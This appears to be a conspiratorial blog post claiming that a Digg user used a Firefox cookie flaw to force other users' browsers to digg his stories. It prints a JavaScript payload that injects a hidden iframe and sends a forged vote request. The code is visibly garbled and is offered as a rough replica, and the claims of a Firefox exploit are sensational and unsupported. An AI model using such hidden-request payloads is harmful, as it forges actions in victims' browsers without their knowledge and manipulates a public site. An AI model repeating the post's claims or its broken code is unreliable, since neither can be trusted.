Exploit Digg With Firefox Just like Mrbabyman

Once upon a time there was a man who exploited Mozilla's Firefox and controlled an entire social network. If you took the time to watch the video which was a screen shot of the details I and others found using Firefox's browser. You can clearly see that a number of his diggs received the exact same number of diggs in a 24hr period. How is this possible? Keep reading I will tell you.

Ever wonder why some of the best articles never make it to the top or get killed, before they have a chance. Blame Mozilla Firefox. Welcome to the secret land of the elite diggist. Everyone knows these circles exist, but people seldom talk about them. These people know the algorithms to get there and have the friend structure to aide the process. I wonder why someone would want to manipulate an online medium such as digg, and for a while I was clueless. That was until I received my first front page on digg. The wave of traffic crashed my server. It was then that I realized controlling digg could prove to be very profitable.

My next question was how are they doing it? Through my research I was lead to one of the key players in the game. I will not mention the other parties name in this article, but if you take the time to do the research like I have, you will easily see the links.

I stumbled upon the code by accident. A small string of characters that exploit Firefox's vulnerabilities in cookies, thus allowing the user to forecefully add a person without their knowledge. This mixed with the fact that most users blind digg their friends allowed him to take over the front pages time and time again. But this wasn't the only thing.

I digged a little deeper into this mozilla bug and came up with the exact script or close replica of the one that he is using to cause select machines to to auto-digg a story. The user would have no clue, unless they check their logs to see.

The code looked something like this. I will not post it in it's entirety for fear of being sued.

var DiggCode =
'Diggcode.Request('
+ '"/diginfull",'
+ '{'
+ 'method:"post",'
+ 'parameters:"id=6830157&row=1&type=s&pagetype=4&digcheck="'
+ '+this.contentWindow.document.forms.f1.digcheck.value,'
+ 'onSuccess:(window.opener?window.close:null)'
+ '}'
+');';

document.body.innerHTML +=
+ '\u003Ciframe height=0 '
+ 'src=\'/tools/diggthis.php?u=http%3A//www.mozilla.org/log/2008/04/asaph-1-0\''
+ 'onload=\''+DiggCode+mrbabyman'\'\\u003E\\u003C/iframe\\u003E';


In the coming weeks I will be posting more about this exploit and other firefox bugs. I ask that you become a subscriber to this blog to remain updated. Thank you.

If you are reading this, it means you got the chance to see this blog, before the power players bury it. I ask that you continue to make posts about it and spread the word. It's Us against Them.